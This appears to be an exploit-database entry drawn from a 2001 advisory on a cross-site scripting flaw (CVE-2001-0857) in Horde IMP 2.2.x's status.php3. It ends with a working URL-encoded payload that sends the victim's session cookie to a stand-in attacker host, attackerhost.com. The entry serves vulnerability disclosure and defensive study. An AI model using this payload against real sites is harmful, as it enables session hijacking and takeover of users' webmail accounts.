Horde IMP 2.2.x - Session Hijacking

Author: Joao Pedro Goncalves
type: remote
platform: linux
port: 
date_added: 2001-11-09  
date_updated: 2012-09-08  
verified: 1  
codes: CVE-2001-0857;OSVDB-668  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21151.txt  
source: https://www.securityfocus.com/bid/3525/info

IMP is a powerful web-based mail interface/client developed by members of the Horde project.

Encoded HTML tags are not stripped from requests to access 'status.php3'. It is possible for a remote attacker to construct a link which when clicked will cause arbitrary script code to be executed in the browser of an unsuspecting user in the context of a site running Horde IMP.

As a result, it has been proven that this issue can be exploited to steal a legitimate user's cookie-based authentication credentials and gain unauthorized access to that user's webmail account.

http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript
%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co
m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%
20%27%3E%27)%3B%3C%2Fscript%3E%0A